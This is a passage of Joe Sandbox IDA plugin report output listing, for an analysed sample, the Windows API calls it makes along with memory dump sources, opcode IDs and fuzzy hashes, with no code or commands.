                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2818636725-0
                                                                                                                            • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                            • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                                            • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                            • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2919029540-0
                                                                                                                            • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                            • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                                            • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                            • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4097029671-0
                                                                                                                            • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                            • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                                            • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                            • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                            • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CurrentEnumWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2396873506-0
                                                                                                                            • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                            • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                                            • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                            • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastMove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 55378915-0
                                                                                                                            • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                            • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                                            • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                            • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1375471231-0
                                                                                                                            • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                            • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                                            • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                            • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B19
• GetLastError.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B21
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
• Opcode ID: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
• Instruction ID: ab2d8551c2587fa33e08e03b3339d41412f2fea6ae8ede581cb29ed56d474115
• Opcode Fuzzy Hash: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
• Instruction Fuzzy Hash: DDF0FC71A04708ABCB11EF759D414AEB7E8EB4A32575047B7FC14E3282D7B86E04859C
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423249
• LoadCursorA.USER32(00000000,00000000), ref: 00423273
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
• Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
• Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
• Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E39E
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
• Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
• Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
• Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(00000316,0046E17A), ref: 0046E0EE
• 76CCE550.OLE32(00499B98,00000000,00000001,00499BA8,?,00000316,0046E17A), ref: 0046E10A
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: E550Version
• String ID:
• API String ID: 1323609852-0
• Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
• Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
• Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
• Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 004162E1
• GetClassInfoA.USER32(00000000,?,?), ref: 004162F1
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ClassInfo
• String ID:
• API String ID: 3534257612-0
• Opcode ID: 1299c1a0664136db271893dd0cc50e967199de2eea8caf0295a053f4b6d41932
• Instruction ID: 8e3ee469ef83f81d8c71ae4630d2e8c7c449d5c480d74fd2e2a5eda3e874073d
• Opcode Fuzzy Hash: 1299c1a0664136db271893dd0cc50e967199de2eea8caf0295a053f4b6d41932
• Instruction Fuzzy Hash: BDE012B26015155ED710DBA89D81EE736DCDB08350B210177BE08CA256D364DD008BA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
• 76CF83B0.OLE32(?,0047C8DE), ref: 0047C8D1
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FolderKnownPath
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 3622228125-544719455
• Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
• Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
• Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
• Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
• Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
• Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
• Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Global$Alloc
• String ID:
• API String ID: 2558781224-0
• Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
• Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
• Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
• Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2087232378-0
                                                                                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                                              • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1658689577-0
                                                                                                                            • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                            • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                                            • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                            • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoScroll
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 629608716-0
                                                                                                                            • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                            • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                                            • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                            • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                                              • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                                              • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
